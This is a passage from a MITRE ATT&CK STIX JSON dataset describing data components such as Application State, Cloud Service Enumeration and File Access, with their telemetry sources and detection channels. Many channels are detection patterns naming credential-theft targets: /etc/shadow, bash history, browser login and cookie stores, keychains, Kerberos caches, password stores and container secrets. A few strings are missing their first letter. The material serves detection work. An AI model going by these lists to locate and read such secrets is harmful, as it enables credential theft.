                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config push events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed authentication requests redirected to non-standard portals"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "PushNotificationSent"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Failed password or accepted password for SSH users"
                        },
                        {
                            "name": "saas:Airtable",
                            "channel": "EXPORT: User-triggered data export via GUI or API"
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-volume API calls or traffic via messaging or webhook service"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
                        },
                        {
                            "name": "saas:box",
                            "channel": "User navigated to admin interface"
                        },
                        {
                            "name": "saas:collaboration",
                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "access.content"
                        },
                        {
                            "name": "saas:email",
                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
                        },
                        {
                            "name": "saas:finance",
                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
                        },
                        {
                            "name": "saas:github",
                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
                        },
                        {
                            "name": "saas:gmail",
                            "channel": "SendEmail, OpenAttachment, ClickLink"
                        },
                        {
                            "name": "saas:googledrive",
                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "OAuth2 authorization grants / Admin role assignments"
                        },
                        {
                            "name": "saas:hubspot",
                            "channel": "contact_viewed, contact_exported, login"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "MFAChallengeIssued"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "WebUI access to administrator dashboard"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Federation configuration update or signing certificate change"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "System API Call: user.read, group.read"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
                        },
                        {
                            "name": "saas:openai",
                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "DataExport, RestAPI, Login, ReportExport"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "file_upload, message_send, message_click"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "conversations.history, files.list, users.info, audit_logs"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
                        },
                        {
                            "name": "saas:Snowflake",
                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
                        },
                        {
                            "name": "saas:teams",
                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "unusual web session tokens and automation patterns during login"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook errors loading or processing custom form templates"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule execution failure or abnormal rule execution context"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "SCCM, Intune logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule creation, form load, or homepage redirection"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange logs or header artifacts"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=6416"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1102"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Device started/installed (UMDF) GUIDs"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=104"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1341, 1342, 1020, 1063"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-11 16:00:13.775000+00:00",
                    "modified": "2026-04-15 20:49:00.264000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0123",
                            "external_id": "DC0123"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application State",
                    "description": "Application State represents the operational status and lifecycle context of a mobile application at a given point in time. This includes whether the application is running in the foreground or background, its activity state, recent user interaction, and transitions between lifecycle states.\n\nMonitoring application state helps defenders identify suspicious behavior where an application performs sensitive actions while inactive, in the background, or without recent user interaction.\n\nApplication state is particularly useful when detecting malicious activity that occurs outside normal user-driven workflows.\n\nExamples\nAndroid\n\n- Application transitions from foreground to background\n- Application running as a background service\n- Application started via broadcast receiver\n- Application launched automatically after device boot\n\niOS\n\n- Application entering active, inactive, or background state\n- Background task execution\n- Background fetch activity\n- Application wake events triggered by push notifications or system services\n\nData Collection Measures\n- Mobile EDR / MTD runtime monitoring\n- OS lifecycle event telemetry\n- Application runtime instrumentation\n- Mobile security platform behavioral monitoring\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "pplication or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application wakes, becomes active, refreshes, or foregrounds immediately after locked or inactive state transition with weak recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application runs in foreground, service, or sustained background-active state while concentrated file transformation occurs with weak or no recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Updated or newly delivered application becomes active, launches background services, or executes shortly after install/update with minimal user interaction inconsistent with baseline"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Newly installed or updated application launches background service, becomes active without recent user interaction, or executes immediately after update in a pattern inconsistent with baseline"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Protected resource use or privileged framework access occurs while device is locked, before normal setup completion, or from an app/service not in foreground and not on approved preload list"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app or device-originated network activity occurs while the device is locked or before expected managed app initialization sequence, inconsistent with expected background refresh baseline"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app begins background execution, persistent service activity, overlay-like behavior, or lock-state activity inconsistent with its historical baseline or expected first-run sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated managed app begins background activity, persistent refresh, or lock-state-adjacent activity inconsistent with expected first-run behavior, user interaction timing, or historical baseline"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App communicating with external web service is backgrounded, persistent, recently awakened, or active while device is locked or without recent user interaction in a way inconsistent with expected app behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app shows background activity, refresh, or lock-state-adjacent execution temporally aligned to web-service communication without expected foreground use or recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background or foreground_service active when resolver retrieval request occurred and pivot connection followed without foreground transition"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before resolver retrieval and subsequent pivot connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked or BackgroundRefresh active during resolver\u2192pivot sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before resolver request and pivot connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when bidirectional exchange with public web-service domain began and no foreground transition occurred between retrieval and outbound write"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "BackgroundRefresh or background activity was active when retrieve-then-write exchange with public web-service domain occurred"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when repeated retrieval from public web-service domain began and no foreground transition occurred during the retrieval sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when non-standard-port session began and no foreground transition occurred during repeated or persistent connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before camera session start and no foreground transition occurred during sustained capture interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background activity, low-interaction device state, or DeviceLockState=locked was observed during sustained camera session or immediately before camera access from same bundle context"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Capturing app remained backgrounded or foreground-service-only while screen capture session occurred and another app was foregrounded during capture interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before screen capture session start and no expected foreground transition or consent-linked interaction occurred during capture interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Sensitive app category remained foregrounded during screen capture session from different app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Injecting app remained backgrounded or foreground-service-only while injected click, global action, or text insertion occurred in a different foreground app"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before injected UI action and no matching touch interaction was observed for the target foreground app during injection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Sensitive app category remained foregrounded during injected UI sequence from different app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Notification access event occurs while app_state=background AND device_state=locked OR no recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Asymmetric crypto operations occur while app_state=background OR device_locked=true OR no recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "TLS trust customization and outbound HTTPS session occur while app_state=background or device_locked=true or recent_user_interaction=false"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app initiates or resumes network-capable execution while app_state=background or device_locked=true before opaque TLS session attempt"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app enters background-capable execution or resumes processing immediately before archive-like file creation or upload behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Persistent foreground-service notification is created, updated, or remains visible while app behavior or notification identity is inconsistent with declared function during the persistence interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Ingress transfer and local file creation occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Ingress retrieval and staging occur while app_state=background or device_locked=true or recent_user_interaction=false during the acquisition phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Native library load or JNI-backed execution occurs while app_state=background or device_locked=true or recent_user_interaction=false during the execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Modified or newly replaced application begins execution or persists while recent_user_interaction=false or device_locked=true or launch context is inconsistent with expected user-driven update flow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "System event occurs (e.g., SMS received, device boot completed, network state changed) acting as trigger event for execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application remains inactive across normal execution windows and transitions into background or foreground activity burst only when qualifying device context, lock state, locale, or network condition exists"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application remains dormant, low-activity, or background-resident across non-qualifying locations and transitions into active execution only after geographic condition is met"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application reduces or halts operational activity during periods of active user interaction and resumes background execution or periodic work only during low-motion or idle intervals"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "ecurity or monitoring application transitions to disabled, inactive, or non-reporting state while other applications remain active"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-02-23 19:38:20.657000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0083",
                            "external_id": "DC0083"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Cloud Service Enumeration",
                    "description": "Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples: \n\nAWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.\n- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.\n- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.\n- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetSecretValue"
                        },
                        {
                            "name": "gcp:secrets",
                            "channel": "accessSecretVersion"
                        },
                        {
                            "name": "azure:ad",
                            "channel": "SecretGet"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ssm:ListInventoryEntries"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "DescribeInstances, DescribeServices, ListFunctions: High frequency enumeration calls or unusual user agents performing discovery"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "ListApplications, ListServicePrincipals: Large-scale queries against identity or application objects"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Get-MsolServicePrincipal, ListAppRoles: Service discovery operations executed by accounts not normally performing administrative tasks"
                        },
                        {
                            "name": "saas:adminapi",
                            "channel": "ListIntegrations, ListServices: Repeated service discovery requests from accounts without administrative responsibilities"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetInstanceIdentityDocument or IMDSv2 token requests"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "DescribeUsers / ListUsers / GetUser"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Graph API Query"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Device lookup, location query, or remote management operation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ]
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:39:07.536000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0055",
                            "external_id": "DC0055"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Access",
                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "macOS:unifiedlog",
                            "channel": "looking for file access to scripts with abnormal encoding patterns"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "KeyChain/AndroidKeyStore read of token alias"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/proc/*/mem read attempt"
                        },
                        {
                            "name": "auditd:FS",
                            "channel": "read: File access to /proc/modules or /sys/module/"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, or stat of browser config files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, flock, fcntl, unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Unusual processes accessing or modifying cookie databases"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH records referencing /dev/video*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Processes reading credential or token cache files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive file directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive config or secret files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read access to ~/.bash_history"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or read to browser cookie storage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, mount"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories (/etc, /home/*)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
                        },
                        {
                            "name": "CloudTrail:GetObject",
                            "channel": "sensitive credential files in buckets or local image storage"
                        },
                        {
                            "name": "desktop:file_manager",
                            "channel": "nautilus, dolphin, or gvfs logs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "container_file_activity"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "open/read on secret mount paths"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore file access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "read: Access to sensitive log files by non-admin users"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore/log file access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "vSphere File API Access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "file copy or datastore upload via HTTPS"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "guest OS outbound transfer logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS access logs"
                        },
                        {
                            "name": "esxis:vmkernel",
                            "channel": "Datastore Access"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating access to system configuration files and environmental information sources"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File Access Monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Disk Activity Tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem activity"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Call Monitoring"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "read/write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open for known browser cookie paths"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file reads/writes from /Volumes/"
                        },
                        {
                            "name": "fs:quarantine",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Write operations to storage"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "/proc/*/maps access"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "auth.log or custom tool logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "/var/log/syslog"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, MailboxAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open or read syscall to ~/.bash_history"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open, es_event_exec"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "Access to Keychain DB or system.keychain"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "~/Library/Keychains, /Library/Keychains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
                        },
